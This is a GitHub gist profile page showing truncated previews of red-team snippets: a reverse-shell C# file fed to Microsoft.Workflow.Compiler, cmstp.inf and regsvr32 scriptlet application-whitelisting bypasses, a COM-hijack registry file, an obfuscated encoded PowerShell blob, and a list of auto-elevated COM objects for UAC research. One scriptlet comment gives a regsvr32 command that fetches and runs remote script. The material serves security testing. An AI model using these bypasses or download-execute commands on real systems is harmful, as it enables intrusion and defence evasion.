Skip to content

Instantly share code, notes, and snippets.

View Elm0D's full-sized avatar

Elm0D Elm0D

32 followers · 21 following
View GitHub Profile
@Elm0D
Elm0D / REV.txt
Created October 26, 2018 15:57
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>Rev.Shell</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
@Elm0D
Elm0D / Rev.Shell
Last active August 26, 2022 12:52
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Workflow.Activities;
using System.Security.Cryptography;
using System.Reflection;
@Elm0D
Elm0D / jquery.binarytransport.js
Created September 17, 2018 22:46
/**
*
* jquery.binarytransport.js
*
* @description. jQuery ajax transport for making binary data type requests.
* @version 1.0
* @author Henry Algus <[email protected]>
*
*/
@Elm0D
Elm0D / winlogon.reg
Created February 13, 2018 15:44
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@Elm0D
Elm0D / cmstp.inf
Created January 31, 2018 18:08
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
@Elm0D
Elm0D / Scriptlet_MSG.sct
Last active January 31, 2018 18:07
<?xml version="1.0" encoding="utf-8"?>
<package>
<component
id="dummy">
<registration
description="dummy"
progid="dummy"
version="1.00"
remotable="True">
<script
@Elm0D
Elm0D / Scriptlet.sct
Last active February 25, 2021 21:05
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
@Elm0D
Elm0D / scriptlet_Downloader.sct
Last active February 25, 2021 21:06
<?XML version="1.0"?>
<scriptlet>
<registration
description="FofX"
progid="FofX"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32.exe /s /n /u /i:http://server/scriptlet_Downloader.sct scrobj.dll -->
@Elm0D
Elm0D / nurdin344.ps1
Created November 5, 2017 20:58
$KyhNNDbMcOVTCOD = @'
7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/j3rv/+/cxcP+jX+PX+jV/w1/zN/g1fo0nv4YgRs//9QfQP6lp8XvK77+W/dr+/DX+Ifn81+Afv+cf/mv8Gr8Z/8/9tD/4+av+gF/j13iNX/4g917w/EW/xq/xG0U+vvFJf41f4zfw/vwN6O9ve3+P2/xdSz9/nWNpy2Pt9E8f/wHjuqmn+APf/UH682nY7vek/43rvKymiutfpO2e9do9sX/o8x/9AfLz278GXvl1f41/7v6v8Wv8e9/6NX6NX5P+/t1/jV/j1/ut7jueuM3zC3+tLXo1+TV+jW/hf7/W1q+rf/wrza9Pv/1B9N2v0/wG+A1z1/wYfvu18VuC334d/PYb4rdfFzNKIH6N33Ln1+T5ohd/81/jl+L1ioaYJJ/8Gr/et8x3vxZ/B4DVb9z97tfm79BF9Zt0v/t1+Dt0Wv2m3e9+Xf4OaFS/mfnud9z5dX6N34pQ+PXw3a/1x9GP33H0W/ymv8b/9dvgt+q3pmbbv/Zv88mv+dv+Gr/lr/Ob/zoP/wuC8kvpm1/nt/q/fs3f5v/6NX/LX/c3/3VH9/iDfwntt34bal/9tvTPb/nr/ea/3ui3qQnw6rf5439LGurWb0efNr89/fODX+OT3/DXaH4HUAQv/hqd13+r6ndk8oLknyT/wS/5D+o1DeTX/N23f51f+Nt88tv87r/R1u9MX/8G1S9AU0bit/m/fu3/6zf/hfUhdfXbcl
@Elm0D
Elm0D / Autoelevated COM objects
Created October 19, 2017 12:47
List of COM object with enabled elevation. This does not mean they all useful for bypassing UAC or anything like this. Most of them are not. Some of them like Copy/Move/Rename/Delete/Link Object and Shell Security Editor already used by malware. All others need to be investigated, use OleView from Windows SDK for more info. Snapshots taken from …
List of COM object with enabled elevation. This does not mean they all useful for bypassing UAC or anything like this. Most of them are not. Some of them like Copy/Move/Rename/Delete/Link Object and Shell Security Editor already used by malware. All others need to be investigated, use OleView from Windows SDK for more info.
Snapshots taken from clean installs.
Windows 7 SP1 x64, 7601
WPD Association LUA Virtual Factory
{00393519-3A67-4507-A2B8-85146167ACA7}
Virtual Factory for Biometrics
{0142e4d1-fb7a-11dc-ba4a-000ffe7ab428}